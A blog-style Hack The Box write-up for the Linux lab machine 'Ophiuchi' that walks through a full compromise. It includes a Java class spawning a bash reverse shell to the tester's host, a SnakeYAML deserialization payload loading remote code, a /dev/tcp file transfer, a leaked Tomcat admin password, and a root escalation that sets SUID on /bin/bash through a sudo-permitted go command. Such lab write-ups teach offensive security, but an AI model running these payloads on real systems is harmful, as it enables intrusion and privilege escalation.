Hack-The-Box-walkthrough[Ophiuchi]

Posted on Edited on In Views: Word count in article: 1.3k Reading time ≈ 5 mins.

introduce

OS: Linux
Difficulty: Medium
Points: 30
Release: 13 Feb 2021
IP: 10.10.10.227

  • my htb rank

information gathering

first use nmap as usaul

1
2
3
4
5
6
┌──(root💀kali)-[~/hackthebox/machine/ophiuchi]
└─# nmap -sV -v -p- --min-rate=10000 10.10.10.227
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
8080/tcp open  http    Apache Tomcat 9.0.38
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

get user

on port 8080 we found Online YAML Parser

after google search, we found an exploit

  • yaml-payload

download the exploit, then modify src/artsploit/AwesomeScriptEngineFactory.java to the following content

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
package artsploit;

import javax.script.ScriptEngine;
import javax.script.ScriptEngineFactory;
import java.io.IOException;
import java.util.List;

public class AwesomeScriptEngineFactory implements ScriptEngineFactory {

    public AwesomeScriptEngineFactory() {
        String [] cmd={"bash","-c","bash -i >& /dev/tcp/10.10.14.5/9001 0>&1"};
        String [] jex={"bash","-c","{echo,$(echo -n $cmd | base64)}|{base64,-d}|{bash,-i}"};
        try {
            Runtime.getRuntime().exec(cmd);
            Runtime.getRuntime().exec(jex);
            Runtime.getRuntime().exec("echo $jex");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    @Override
    public String getEngineName() {
        return null;
    }

    @Override
    public String getEngineVersion() {
        return null;
    }

    @Override
    public List<String> getExtensions() {
        return null;
    }

    @Override
    public List<String> getMimeTypes() {
        return null;
    }

    @Override
    public List<String> getNames() {
        return null;
    }

    @Override
    public String getLanguageName() {
        return null;
    }

    @Override
    public String getLanguageVersion() {
        return null;
    }

    @Override
    public Object getParameter(String key) {
        return null;
    }

    @Override
    public String getMethodCallSyntax(String obj, String m, String... args) {
        return null;
    }

    @Override
    public String getOutputStatement(String toDisplay) {
        return null;
    }

    @Override
    public String getProgram(String... statements) {
        return null;
    }

    @Override
    public ScriptEngine getScriptEngine() {
        return null;
    }
}

compile and serve:

1
2
3
javac src/artsploit/AwesomeScriptEngineFactory.java
cd src
python3 -m http.server 80

trigger exploit: browse to http://10.10.14.5:8080/ and enter:

1
2
3
4
5
!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://10.10.14.5/"]
  ]]
]

privesc from tomcat to admin:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
┌──(root💀kali)-[~]
└─# nc -lvp 9001
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.227.
Ncat: Connection from 10.10.10.227:58294.
bash: cannot set terminal process group (815): Inappropriate ioctl for device
bash: no job control in this shell
tomcat@ophiuchi:/$ id
whoid
uid=1001(tomcat) gid=1001(tomcat) groups=1001(tomcat)
tomcat@ophiuchi:/$ ami
whoami
tomcat
tomcat@ophiuchi:/$ cd ~
cd ~
tomcat@ophiuchi:~$ ls
ls
bin
BUILDING.txt
conf
CONTRIBUTING.md
lib
LICENSE
logs
NOTICE
README.md
RELEASE-NOTES
RUNNING.txt
temp
webapps
work
tomcat@ophiuchi:~$ cd conf
cd conf
tomcat@ophiuchi:~/conf$ ls
ls
catalina.policy
catalina.properties
context.xml
jaspic-providers.xml
jaspic-providers.xsd
logging.properties
server.xml
tomcat-users.xml
tomcat-users.xsd
web.xml
tomcat@ophiuchi:~/conf$ cat * | grep pass
cat * | grep pass
# passed to checkPackageAccess unless the
# passed to checkPackageDefinition unless the
         analyzes the HTTP headers included with the request, and passes them
      <!-- Use the LockOutRealm to prevent attempts to guess user passwords
<user username="admin" password="whythereisalimit" roles="manager-gui,admin-gui"/>
  you must define such a user - the username and password are arbitrary. It is
  them. You will also need to set the passwords to something appropriate.
  <user username="tomcat" password="<must-be-changed>" roles="tomcat"/>
  <user username="both" password="<must-be-changed>" roles="tomcat,role1"/>
  <user username="role1" password="<must-be-changed>" roles="role1"/>
            <xs:attribute name="password" type="xs:string" />
  <!--                       pass the result to this style sheet residing   -->
  <!--                       pass the result to this style sheet which is   -->
  <!--                        work-around various issues when Java passes   -->
  <!--                        headers passed to the CGI process as          -->
  <!--   passShellEnvironment Should the shell environment variables (if    -->
  <!--                        any) be passed to the CGI script? [false]     -->
        <mime-type>application/vnd.blueice.multipass</mime-type>
tomcat@ophiuchi:~/conf$ su admin
su admin
Password: whythereisalimit
id
uid=1000(admin) gid=1000(admin) groups=1000(admin)
whoami
admin
python -c 'import pty; pty.spawn("/bin/bash")'
bash: line 3: python: command not found
python3 -c 'import pty; pty.spawn("/bin/bash")'
admin@ophiuchi:/opt/tomcat/conf$ id
id
uid=1000(admin) gid=1000(admin) groups=1000(admin)

then got the user flag

1
2
3
4
5
6
7
8
admin@ophiuchi:/opt/tomcat/conf$ cd
cd
admin@ophiuchi:~$ ls
ls
user.txt
admin@ophiuchi:~$ cat user.txt
cat user.txt
4985ea2805b1c7ee8adca11a4f0b0b39

get root

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
┌──(root💀kali)-[~/hackthebox/machine/ophiuchi]
└─# ssh admin@10.10.10.227
The authenticity of host '10.10.10.227 (10.10.10.227)' can't be established.
ECDSA key fingerprint is SHA256:OmZ+JsRqDVNaBWMshp7wogZM0KhSKkp1YmaILhRxSY0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.227' (ECDSA) to the list of known hosts.
admin@10.10.10.227's password: 
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-51-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun 14 Feb 2021 08:42:54 AM UTC

  System load:             0.0
  Usage of /:              20.4% of 27.43GB
  Memory usage:            18%
  Swap usage:              0%
  Processes:               219
  Users logged in:         0
  IPv4 address for ens160: 10.10.10.227
  IPv6 address for ens160: dead:beef::250:56ff:feb9:1c49


176 updates can be installed immediately.
56 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sat Feb 13 19:55:31 2021 from 10.10.14.17
admin@ophiuchi:~$ id
uid=1000(admin) gid=1000(admin) groups=1000(admin)
admin@ophiuchi:~$ sudo -l
Matching Defaults entries for admin on ophiuchi:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User admin may run the following commands on ophiuchi:
    (ALL) NOPASSWD: /usr/bin/go run /opt/wasm-functions/index.go

download main.wasm:

  1. start listener on your machine
1
2
3
4
5
6
7
┌──(root💀kali)-[~/hackthebox/machine/ophiuchi]
└─# nc -lvnp 9002 > main.wasm
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9002
Ncat: Listening on 0.0.0.0:9002
Ncat: Connection from 10.10.10.227.
Ncat: Connection from 10.10.10.227:55062.
  1. send file
1
admin@ophiuchi:~$ cat /opt/wasm-functions/main.wasm > /dev/tcp/10.10.14.5/9002

analyze file:

  1. upload at https://webassembly.github.io/wabt/demo/wasm2wat/index.html

  2. edit the 0 to a 1 and copy the code:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    (module
      (type $t0 (func (result i32)))
      (func $info (export "info") (type $t0) (result i32)
        (i32.const 1))
      (table $T0 1 1 funcref)
      (memory $memory (export "memory") 16)
      (global $g0 (mut i32) (i32.const 1048576))
      (global $__data_end (export "__data_end") i32 (i32.const 1048576))
      (global $__heap_base (export "__heap_base") i32 (i32.const 1048576)))

  3. paste the code at https://webassembly.github.io/wabt/demo/wat2wasm/index.html

  4. click on download

  5. transfer the downloaded file to target to a writeable directory

  6. create deploy.sh and run sudo command:

1
2
3
4
┌──(root💀kali)-[~/hackthebox/machine/ophiuchi]
└─# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.227 - - [14/Feb/2021 04:02:19] "GET /test.wasm HTTP/1.1" 200 -
1
2
3
4
5
6
cd /tmp
echo "chmod +s /bin/bash" > deploy.sh
wget http://10.10.14.5/test.wasm main.wasm
chmod 777 *
sudo -u root /usr/bin/go run /opt/wasm-functions/index.go
/bin/bash -p

and now we are root

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
admin@ophiuchi:/tmp$ ls
deploy.sh          systemd-private-64051d8f15f4418cbb11018667bc15ad-systemd-logind.service-Y5t4mf     vmware-root_667-3980363901
hsperfdata_tomcat  systemd-private-64051d8f15f4418cbb11018667bc15ad-systemd-resolved.service-lBxjmi   wasm-functions
main.wasm          systemd-private-64051d8f15f4418cbb11018667bc15ad-systemd-timesyncd.service-RVvCVh
admin@ophiuchi:/tmp$ sudo -u root /usr/bin/go run /opt/wasm-functions/index.go
Ready to deploy

admin@ophiuchi:/tmp$ /bin/bash -p
bash-5.0# id
uid=1000(admin) gid=1000(admin) euid=0(root) egid=0(root) groups=0(root),1000(admin)
bash-5.0# whoami
root
bash-5.0# cd
bash-5.0# ls
user.txt
bash-5.0# cd /root
bash-5.0# ls
go  root.txt  snap
bash-5.0# cat root.txt
5296450d942ebf2bd9763b2431f7f1d5

Summary of knowledge

  • modify yaml-payload to get a reverse shell
  • tomcat password leak
  • .wasm file analyse and modify
  • privesc through NOPASSWD /usr/bin/go

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security reseacher, hacker, bug hunter and more…